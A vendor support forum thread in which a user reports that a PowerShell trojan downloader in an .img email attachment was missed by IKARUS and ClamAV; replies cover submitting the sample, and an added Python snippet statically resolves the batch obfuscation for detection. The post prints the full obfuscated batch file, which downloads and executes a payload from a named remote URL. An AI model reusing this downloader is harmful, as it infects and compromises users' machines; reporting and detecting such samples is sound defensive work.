Virus not detected by both Ikarus and Clam | MDaemon Technologies, Ltd.

Virus not detected by both Ikarus and Clam


  • Hi,

    Running the latest version of MDaemon and the Antivirus plugin. Today an email with a disk image attachment (.img file) containing a batch file (PowerShell/TrojanDownloader.Agent trojan) was passed through without being blocked. Fortunately the Eset antivirus on the client's endpoint detected it.

    Here is the MDaemon antivirus log:

    -Mon 2024-02-19 07:43:40.120: * IKARUS AV: clean  (0.020 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)
    -Mon 2024-02-19 07:43:40.764: * ClamAV: clean  (0.643 s) doc20241902070611.img (C:\MDaemon\CFilter\TEMP\3141324088\pd82059750.att)

    and here is the batch file hidden in the attachment:

    @echo off
    set rt0=pAoAwAeArAsAhAeAlAl

    set rt0=%rt0:A=%
    Set message=$rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType
    set message2=], 3072);[System.Net.ServicePointManager]::SecurityProto
    set message3=col = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thParti
    set message4=alName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
    set message5=$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tt
    set message6=y;$rot='Down','load','str','ing';$rotJ=($rot -join '');$bnt='https','://antuofermo.it/G12.txt';$bng0=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bng0);z($mv)

    start /min %rt0% %message%%message2%%message3%%message4%%message5%%message6%
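
An added example, not part of the original post and not MDaemon, IKARUS or ClamAV code: a static resolver for the `set` / `%var:A=%` substitution trick used in the batch file above, showing how a content filter could recover the launched command line without executing anything. The sample script is constructed and harmless, the function names are hypothetical, and only plain `set name=value`, `%name%` and `%name:old=new%` are handled.

```python
import re

# "set name=value" (unquoted form only; set /a and "set "x=y"" are out of scope here)
SET_RE = re.compile(r'^\s*set\s+([^=\s]+)=(.*)$', re.IGNORECASE)
# %name% or %name:old=new%
VAR_RE = re.compile(r'%([^%:\s]+)(?::([^=%]+)=([^%]*))?%')

def expand(text, env):
    """Expand %name% and %name:old=new% as cmd.exe does (names and 'old' are case-insensitive)."""
    def repl(m):
        value = env.get(m.group(1).lower())
        if value is None:
            return m.group(0)  # unknown variable: leave the token untouched
        if m.group(2) is not None:
            value = re.sub(re.escape(m.group(2)), lambda _: m.group(3),
                           value, flags=re.IGNORECASE)
        return value
    return VAR_RE.sub(repl, text)

def resolve_batch(script):
    """Return each non-'set' line with variables statically resolved. Nothing is run."""
    env, resolved = {}, []
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = expand(m.group(2), env)
        elif line.strip():
            resolved.append(expand(line.strip(), env))
    return resolved

def hidden_interpreters(script, names=("powershell", "wscript", "cscript", "mshta")):
    """Interpreter names present only after expansion, i.e. invisible to a plain string scan."""
    raw = script.lower()
    joined = " ".join(resolve_batch(script)).lower()
    return [n for n in names if n in joined and n not in raw]

# Constructed sample with the same structure as the posted file, but a harmless payload.
SAMPLE = """@echo off
set k1=pZoZwZeZrZsZhZeZlZl
set k1=%k1:Z=%
set p1=Write-Output 'con
set p2=structed sample'
start /min %k1% %p1%%p2%
"""

if __name__ == "__main__":
    for line in resolve_batch(SAMPLE):
        print(line)
    print("hidden:", hidden_interpreters(SAMPLE))
```

An interpreter name that shows up only after expansion is a useful quarantine signal for script files found inside container attachments such as `.img`.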



  • Please put the original MSG file in a password protected zip file and email it to virusfn@mdaemon.com. Please be sure to include the password in your email.



  • "This malware has been classified as a virus since yesterday and is detected accordingly."

    ----------------------------------
    IKARUS Security Software GmbH
    Blechturmgasse 11, A-1050 Wien
    Web: https://www.ikarussecurity.com
    ----------------------------------


  • Thank you for letting us know!

